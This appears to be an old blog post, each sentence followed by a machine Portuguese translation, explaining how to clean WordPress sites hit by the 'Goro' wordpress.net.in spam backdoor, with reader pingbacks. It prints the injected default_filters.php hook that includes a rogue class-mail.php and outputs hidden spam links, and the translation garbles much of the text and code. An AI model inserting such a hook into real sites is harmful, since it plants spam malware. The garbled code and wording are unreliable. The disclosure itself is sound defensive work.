I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in). Eu encontrei esse fórum enquanto navega WordPress apoio, algumas dessas vítimas atualizar seus default_filters.php e fazer o upload de classe-mail.php dentro de suas WordPress sem estar conscientes de que é um backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php . Não existe nenhuma classe-mail.php em WordPress, excepto a classe-phpmailer.php. So don’t get confuse by it. Portanto, não se confunde com ela.
Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes. Abaixo está uma solução rápida sobre como você pode removido o agressor Goro spamware injecção antes do Google proibiu-lhe a partir da Internet tubos.
Workaround Solução
- For temporary disable remote include in php.ini settings. Para desativar temporariamente remoto incluir no php.ini configurações.
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;;; Fopen wrappers; ;;;;;;;;;;;;;;;;;;; Quer a fim de permitir o tratamento de URLs (como http:// ou ftp://) como arquivos. allow_url_fopen = off allow_url_include = off allow_url_fopen = off allow_url_include = off
- Check your .htaccess for suspicious redirect. Verifique o seu. Htaccess suspeitas de redirecionamento.
- Find class-mail.php inside “*/wp-includes/” directory and removed it. Encontre-mail.php classe privilegiada "* / wp-includes /" removido diretório e ele.
- Find the following code inside “*/wp-includes/default_filters.php” and removed it Localize o seguinte código dentro "* / wp-includes/default_filters.php" e suprimiu -
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( "wp_footer ',' wpc7c16b8466d864eeefd20050625c7775 '); função wpc7c16 <> b8466d864eeefd20050625c7775 () (@ incluem ('. / wp-includes / class-mail.php '); if (sizeOf ($ wparr)> 0) (echo" ! div id = \ "Goro \"! "; foreach ($ wparr como $ k => $ v) (echo" ". ucwords ($ v [ 'chave'])." \ n"; if ($ i = = $ inum) break;) echo "! / div !".$_ rodapé;)) Robots.txt Exclusion Robots.txt Exclusão
Optional - Prevent googlebot from indexing the static spam page. Opcional - googlebot Impedir a indexação de spam a página estática.
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Entrar para Wordpress Admin> Gerir> Arquivos> Outros arquivos →-chave na "Robots.txt". Add the following code. Adicione o seguinte código.User-agent: Googlebot Disallow: /*?* Disallow: /*? User-agent: Googlebot Disallow: / *? * Disallow: / *?Refer robots.txt . Refer robots.txt.
Possible WordPress class (suspicious) files that would be tempered Possíveis WordPress classe (suspeitas) ficheiros que seria temperado
Md5 checksum the following files, compare it with official versions from WordPress Release Archive . Checksum MD5 dos seguintes arquivos, compará-la com versões oficiais de WordPress Release Archive.
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Os métodos acima apenas eliminar os spams e deficientes ligações, não há garantia de que irá proteger você de futuras vulnerabilidades. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade . Backup (ou exportar o seu post usando WordPress Extensão RSS-WRX), e executar uma atualização completa.
- Dec 13, 2007 Dez. 13, 2007
I just notice this recently. Eu apenas este anúncio recentemente. You’ll need to check your site HTTP Header. Você precisa verificar o seu site cabeçalho HTTP. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) . A maioria dos sites não sequestrou a resposta correta Status cabeçalho HTTP (400 <> 500). My guess is they did this to cloak from being crawl by search engine spiders. A minha suposição é que fiz a este manto de serem rastreados pelo motor de pesquisa aranhas. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner . Se você tivesse limpos todos os arquivos infectados e seu cabeçalho não obter uma resposta correcta rookit scanner.
Check your website status header, try cloak your browser (UA) as Search Engine Crawler. Verifique o seu site status cabeçalho, tente camuflar o seu navegador (UA) como motor de pesquisa do rastreador. The following screenshot will show you how to setup this at web-sniffer.net. A seguinte tela irá mostrar como a configuração deste web-sniffer.net.
This methods may not work if the cloaking scripts used IP base tracking. Este método pode não funcionar se o disfarce scripts utilizados IP base de monitoramento. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). Então, tente com outro usuário string agente (ou seja: inoktomi, askjeeves, ia_archiver).
Firefox Browser Navegador Firefox
You can also override your useragent string with firefox ↓. Você também pode sobrepor a sua corda com useragent firefox ↓.
about:config → general.useragent.overide = ‘ ua strings ‘ about: config → general.useragent.overide = 'ua strings'
Wordpress.net.in Backdoor Wordpress.net.in Backdoor
Wordpress.net.in Doorway Wordpress.net.in Doorway
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ 24 de Dezembro de 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files Backdoor Files
inside wp-includes directory. dentro wp-inclui diretório.
- compat.php - (replace with latest version) compat.php - (substitui a versão mais recente)
- class-mail.php delete - classe mail.php excluir
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins . digitalizar e remove todos os arquivos e criar um backdoor. htaccess arquivo dentro wp-inclui & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index). Em seguida, adicione o código a seguir para deficientes diretório lista (informations evitar vazamento & Diretório pesquisa índice).
Options -Indexes Opções-Índices Wordpress.net.in New Partner Wordpress.net.in novo parceiro
Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 23 de Fevereiro de 2008, Encontrámos uma assinatura semelhante como a wordpress.net.in qwetro.com (Alemanha). Probably from the same attacker with different agenda. Provavelmente a partir do mesmo atacante com outra ordem de trabalhos.
Related Posts Posts relacionados
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) Bluehost HostMonster CEO's Blog cortado (wordpress.net.in)
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II Matt Heaton Bluehost Hostmonster CEO's cortou mais uma vez - greve II
External Links Ligações externas
- Websniffer View HTTP Request and Response Header Websniffer vista solicitação HTTP e resposta cabeçalho
- Wordpress Support Forum Wordpress apoio Fórum
- National Vulnerability Database Wordpress 2.0 > 2.0.6 Vulnerabilidade de Dados Nacional Wordpress 2,0> 2.0.6
16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16 Responses para "Como remover Wordpress.net.in Spam Injeção"
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [...] Nd enak problema, vendar o? Itno jih je zelo malo rešilo vse skupaj. Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] Ampak Google dela? Udeže: Como a Removido Wordpress.net.in Spam Injeção infectadas pelo 'Goro' Spam classe-mail.php Backdoor Em rešitev je [...]
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [...] Eu encontrar algumas informações úteis sobre como limpar a bagunça que Kakkoi: Como a Removido Wordpress.net.in Spam injecção. [...]
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] Wordpress.net.in revelou um certo número de páginas, incluindo uma inscrição pelo blog Avice De'vereux que descreveu os sintomas e disse que eles foram causados por um spam por injecção adulteração [...]
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [...] É o que Gordon Dewis descoberto: pesquisando wordpress.net.in revelou um certo número de páginas, incluindo uma inscrição pelo blog Avice De'vereux que descreveu os sintomas e disse que eles foram causados por um spam adulteração por injecção [.. .]
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...] [...] Me leva a Avice perfeitamente maravilhosa vida pós poupança, onde ela instrui como remover [...]
[...] en is alle gehackte code gevonden. [...] En alle é gehackte código gevonden. Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. Mocht je van de última Hebben div id = "Goro" hack kijk dan hier voor handige dicas eens voor het verwijderen. Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...] Alhoewel ik geen voorlopig PC klusjes ZOU doen gaan nós toch [...]
I got hacked to, mine was spam links to I got a cortarem, ligações a mina era spam
donaldsensing.com:6666 donaldsensing.com: 6666[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...] [...] Relacionados: blogs tomar Centro de Estágio para marketing e para o Google como remover Wordpress.net.in spam injecção [...]
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name. Não tenho certeza que é "alxumuk" verdadeiro nome é, mas há um editor em DMOZ similar com nome de exibição.
Lack Resources Falta RecursosATM I only have a few raw accesslog from Murray's blog & Jens's blog . Matt Heaton never replies. ATM tenho apenas um pequeno número de matérias-primas accesslog Murray's blog & Jens's blog. Matt Heaton nunca respostas.
I hope that Mr. Goro got careless and show his footprint, I need more raw access log. Espero que o Sr. Goro got descuidados e mostrar as suas pegadas, eu precisam de mais acesso raw rápida. Send it to my email Envie-o para o meu e-mail
[...] might go Here to learn the way to remove the Spam [...] [...] Poderia ir daqui para saber a forma de remover o Spam [...]
Co-Founder of Mozilla Project WordPress Blog's Hacked... Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer. Co-fundador do Projeto Mozilla WordPress's Blog ... Hacked Blake Ross, o Co-fundador do Projeto Mozilla WordPress's Blog Hacked por Wordpress.net.in Blackhat Spammer. ......
[...] het te maken had met spam injection hijack by wordpress.net.in. [...] Het te maken tinha conhecido spam por injecção adulteração wordpress.net.in. Meer info over het probleem kan je hier vinden. Meer info durante Kan het probleem je hier vinden. De eenvoudigste oplossing voor het probleem, is een nieuwe versie van wordpress erop [...] De eenvoudigste oplossing voor het probleem, é versie van een Nieuwe wordpress erop [...]